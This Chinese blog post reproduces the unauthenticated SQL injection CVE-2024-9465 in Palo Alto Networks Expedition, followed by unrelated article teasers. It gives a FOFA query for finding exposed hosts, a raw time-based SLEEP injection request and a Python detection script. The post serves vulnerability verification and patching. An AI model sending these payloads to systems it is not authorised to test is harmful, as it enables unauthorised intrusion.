当前位置：首页 > news >正文

Palo Alto Networks Expedition 未授权SQL注入漏洞复现(CVE-2024-9465)

news 2026/2/9 10:45:36

0x01 产品介绍：

Palo Alto Networks Expedition 是一款强大的工具，帮助用户有效地迁移和优化网络安全策略，提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。

0x02 漏洞描述：

该漏洞由于CHECKPOINT.php文件存在未授权访问。在sql校验逻辑中存在action=import当解析控制参数时会创建变量routename和id并且以字符串格式构造查询。导致了漏洞的产生

0x03 影响版本：

Palo Alto Networks Expedition < 1.2.96

0x04 搜索语句：

Fofa:title="Expedition Project"

0x05 漏洞复现：

poc

POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedaction=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(5)))test)

检测脚本：

脚本作者：https://github.com/horizon3ai/CVE-2024-9465

#!/usr/bin/python3
import argparse
import requests
import urllib3
import sys
import time
urllib3.disable_warnings()def create_checkpoint_table(url: str):print(f'[*] Creating Checkpoint database table...')data = {'action': 'get','type': 'existing_ruleBases','project': 'pandbRBAC',}r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30)if r.status_code == 200 and 'ruleBasesNames' in r.text:print(f'[*] Successfully created the database table')returnprint(f'[-] Unexpected response creating table: {r.status_code}:{r.text}')sys.exit(1)def inject_checkpoint_query(url: str):start_time = time.time()print(f'[*] Injecting 10 second sleep payload into database query...')data = {'action': 'import','type': 'test','project': 'pandbRBAC','signatureid': '1 AND (SELECT 1234 FROM (SELECT(SLEEP(10)))horizon3)',}r = requests.post(f'{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php', data=data, verify=False, timeout=30)execution_time = time.time() - start_timeif r.status_code == 200 and execution_time > 9 and execution_time < 15:print(f'[*] Successfully sent injection payload!')print(f'[+] Target is vulnerable, request took {execution_time} seconds')returnprint(f'[-] Unexpected response sending injection payload: {r.status_code}:{r.text}')sys.exit(1)if __name__ == "__main__":parser = argparse.ArgumentParser()parser.add_argument('-u', '--url', help='The URL of the target', type=str, required=True)args = parser.parse_args()create_checkpoint_table(args.url)inject_checkpoint_query(args.url)

0x06 修复建议：

厂商已发布补丁请即时升级

Expedition | Palo Alto Networks

Palo Alto Networks Expedition 未授权SQL注入漏洞复现(CVE-2024-9465)

0x01 产品介绍： Palo Alto Networks Expedition 是一款强大的工具，帮助用户有效地迁移和优化网络安全策略，提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。 0x02 漏洞描述&am…...

编程日记 2024/10/18 3:29:28

c 语言 sprintf

在C语言中，sprintf是一个非常常用的函数，它用于将格式化的数据写入字符串中。sprintf函数的原型通常定义在stdio.h头文件中。 sprintf函数的原型如下： int sprintf(char *str, const char *format, …); 参数说明： str&#xf…...

编程日记 2024/10/18 3:25:23

stm32单片机个人学习笔记10（TIM编码器接口）

前言本篇文章属于stm32单片机（以下简称单片机）的学习笔记，来源于B站教学视频。下面是这位up主的视频链接。本文为个人学习笔记，只能做参考，细节方面建议观看视频，肯定受益匪浅。 STM32入门教程-2023版细…...

编程日记 2024/10/18 3:24:22

如何在Android中存储数据？

在Android中存储数据是开发过程中至关重要的一环，根据数据的类型、大小、访问频率及安全性需求，开发者可以选择多种存储方式。以下是Android中存储数据的几种主要方式，每种方式都有其特定的应用场景和优缺点。一、SharedPreferences Share…...

编程日记 2024/10/18 3:22:20

13.3寸工业三防平板数字化工厂产线数采手持终端

在数字化工厂的建设浪潮中，高效可靠的数据采集终端至关重要。尤其在水处理、食品加工等特殊工业环境下，设备的耐用性和数据安全性面临严峻挑战。传统的平板电脑难以应对复杂的工业现场，而一款性能卓越、坚固耐用的工业三防平板则成为提升生产…...

编程日记 2024/10/18 3:20:17

ssh连接慢的问题或zookeeper远程连接服务超时

问题原因： 在SSH登录过程中，服务器会通过反向DNS查找客户端的主机名，然后与登录的IP地址进行匹配，以验证登录的合法性。如果客户端的IP没有域名或DNS服务器响应缓慢，这可能导致SSH登录过慢。为了解决这个问题&#xf…...

编程日记 2024/10/18 3:19:16

perf工具使用指导

linux perf工具使用指导 perf 是 Linux 内核自带的性能分析工具，主要用于分析系统性能瓶颈和程序的性能问题。通过合理使用 perf 工具，可以有效地分析和优化系统性能。安装 perf 在大多数 Linux 发行版中，perf 工具通常随内核源代码包一起…...

编程日记 2024/10/18 3:17:15

WordPress 禁用上传媒体图片自动生成缩略图及多尺寸图片教程

一、在设置-媒体-媒体设置中几个尺寸大小的设置不勾选或设置为 0，如下图： 二、找到主题文件 function.php 文件，打开后，在 <?php 后面添加如下代码： function.php 文件路径一般为：WordPress网站根目录…...

编程日记 2024/10/18 3:16:13

锥线性规划【分布鲁棒、两阶段鲁棒方向知识点】

1 锥线性对偶理论本部分看似和分布鲁棒、两阶段鲁棒优化没什么关系，但值得优先学习，原因将在最后揭晓。二阶锥二阶锥（second-order cone，又称ice-cream/Lorentz cone）的形式为： 非负象限锥半正定锥 …...

编程日记 2024/10/18 3:15:12

linux环境下的程序设计与git操作

目录前言： 进度条小程序： 先介绍几个背景知识代码实现 Git操作总结其他指令前言： 本文将重点介绍1. linux下的程序设计，并使用linux下的几个函数接口。实现一个简单的小程序 2.本着开源精神，进行git操作。…...

编程日记 2024/10/18 3:14:10

Matlab中HybridFcn参数的用法

在 MATLAB 中，HybridFcn 参数允许你在全局优化（如遗传算法 ga 或粒子群算法 particleswarm）之后使用局部优化算法进一步微调解的精确度。HybridFcn 通过在全局优化找到的解基础上，进一步调用局部优化器，如 fmincon、pa…...

编程日记 2024/10/18 3:12:07

Leetcode 3316. Find Maximum Removals From Source String

Leetcode 3316. Find Maximum Removals From Source String 1. 解题思路2. 代码实现题目链接：3316. Find Maximum Removals From Source String 1. 解题思路这一题思路上的话就是一个动态规划的题目，我们仿照lcs，考察每一个位置是否可以…...

编程日记 2024/10/18 3:09:05

jeecg3版本的vue，离线启动

jeecg的vue2版本已经停止维护，所以只能用vue3的版本。3版本中使用的是pnpm（npm的增强版本）下载依赖。使用pnpm安装的node_modules，不能直接复制到离线主机中（因为在 pnpm安装过程中，会给依赖的配置文件写死…...

编程日记 2024/10/18 3:08:04

C++的内存管理

[TOC} C的内存管理各个区储存内容 1.栈局部变量和在执行函数时，函数中创建的局部变量都会在栈上创建，函数执行结束时会被自动释放。从高地址向低地址储存。 2.堆是new/malloc/calloc/realloc分配的代码块，需要手动释放。如果程序员没…...

编程日记 2024/10/18 3:06:01

YZ系列工具之YZ09：VBA_Excel之读心术

我给VBA下的定义：VBA是个人小型自动化处理的有效工具。利用好了，可以大大提高自己的工作效率，而且可以提高数据的准确度。我的教程一共九套一部VBA手册，教程分为初级、中级、高级三大部分。是对VBA的系统讲解，从简单的…...

编程日记 2024/10/18 3:04:59

嵌入式系统---看门狗

在嵌入式系统中，看门狗定时器（Watchdog Timer，WDT）是一种常用的机制，用于检测和恢复系统在异常情况下的故障。如果系统因为某种原因（如软件死循环）而变得无响应，看门狗定时器可以自动…...

编程日记 2024/10/18 3:02:57

从MySQL5.7迁移到8.0时，有哪些重要的参数调整或新参数需要注意？

从 MySQL 5.7 迁移到 MySQL 8.0 时，有一些重要的参数调整和新参数需要注意。MySQL 8.0 引入了许多新功能和改进，同时也对一些现有参数进行了更改或废弃。 1. lower_case_table_names 说明: 控制表名是否区分大小写。重要性: 在迁移过程中，确…...

编程日记 2024/10/18 3:01:56

完整发布/上传uniapp Ios应用到App Store流程

使用uniapp打包，假如使用app store证书打包出来的ipa文件，需要上传到app store上才能上架。假如你还没有app store证书，还没有打包，你可以参考下面这篇文章，先创建打包证书再继续看这篇上架的教程：https://…...

编程日记 2024/10/18 2:59:54

CodeActAgent ：Executable Code Actions Elicit Better LLM Agents解读

论文地址 https://arxiv.org/pdf/2402.01030.pdf 项目地址 https://github.com/svjack/CodeActAgent-Gradio/blob/main/README.md 代码智能体的优势选择代码智能体有以下几个关键原因，它们相较于使用类似JSON的字典输出具有显著优势： 1. 代码的高…...

编程日记 2024/10/18 2:58:53

中小型医院网站开发：Spring Boot入门

2 相关技术简介 2.1 Java技术 Java是一种非常常用的编程语言，在全球编程语言排行版上总是前三。在方兴未艾的计算机技术发展历程中，Java的身影无处不在，并且拥有旺盛的生命力。Java的跨平台能力十分强大，只需一次编译，…...

编程日记 2024/10/18 2:57:52

第19节 Node.js Express 框架

Express 是一个为Node.js设计的web开发框架，它基于nodejs平台。 Express 简介 Express是一个简洁而灵活的node.js Web应用框架, 提供了一系列强大特性帮助你创建各种Web应用，和丰富的HTTP工具。使用Express可以快速地搭建一个完整功能的网站。 Expre…...

编程新知 2026/2/8 6:37:43

国防科技大学计算机基础课程笔记02信息编码

1.机内码和国标码国标码就是我们非常熟悉的这个GB2312,但是因为都是16进制，因此这个了16进制的数据既可以翻译成为这个机器码，也可以翻译成为这个国标码，所以这个时候很容易会出现这个歧义的情况； 因此，我们的这个国…...

编程新知 2026/2/8 4:37:15

多模态商品数据接口：融合图像、语音与文字的下一代商品详情体验

一、多模态商品数据接口的技术架构 （一）多模态数据融合引擎跨模态语义对齐通过Transformer架构实现图像、语音、文字的语义关联。例如，当用户上传一张“蓝色连衣裙”的图片时，接口可自动提取图像中的颜色（RGB值&…...

编程新知 2025/7/23 3:55:49

CREATE USER read_only WITH PASSWORD 密码 -- 连接到xxx数据库 \c xxx -- 授予对xxx数据库的只读权限 GRANT CONNECT ON DATABASE xxx TO read_only; GRANT USAGE ON SCHEMA public TO read_only; GRANT SELECT ON ALL TABLES IN SCHEMA public TO read_only; GRANT EXECUTE O…...

编程新知 2025/9/18 19:34:22